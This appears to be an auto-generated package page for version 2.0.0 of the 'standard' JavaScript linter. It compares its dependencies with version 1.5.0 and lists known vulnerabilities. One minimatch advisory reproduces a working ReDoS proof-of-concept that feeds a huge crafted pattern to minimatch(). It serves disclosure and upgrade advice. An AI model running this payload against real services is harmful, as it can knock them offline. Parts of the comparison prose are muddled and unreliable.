Standard version 2.0.0 introduces a notable change by incorporating ESLint, a popular JavaScript linting tool, into its core functionality. This addition distinguishes it from version 1.5.0, which relied on jscs and jshint for code style enforcement. While both versions maintain the same core dependencies like glob, jscs (in 1.5.0, replaced by eslint in 2.0.0), split, jshint, find-root, and minimatch for file system and code manipulation, the shift to ESLint represents a modernization of the underlying linting engine. This change offers developers access to a more extensible and configurable linting experience, considering ESLint's plugin-based architecture and wider community support.
Developers considering migrating to version 2.0.0 should be aware of the implications of switching from jscs/jshint to ESLint. It might require adjusting existing configurations or rulesets to align with ESLint's syntax and capabilities. Furthermore, ESLint's robustness and extensive rule library provide more granular control over JavaScript code style, potentially leading to more consistent and maintainable codebases. The developer dependencies, mkdirp, rimraf, and run-series, remain unchanged between the versions, suggesting that the core build and testing processes are consistent. Finally, version 2.0.0 was released on January 29, 2015, a day later than version 1.5.0. Therefore, it showcases the ongoing development and refinement of the standard JavaScript style.
All the vulnerabilities related to the version 2.0.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.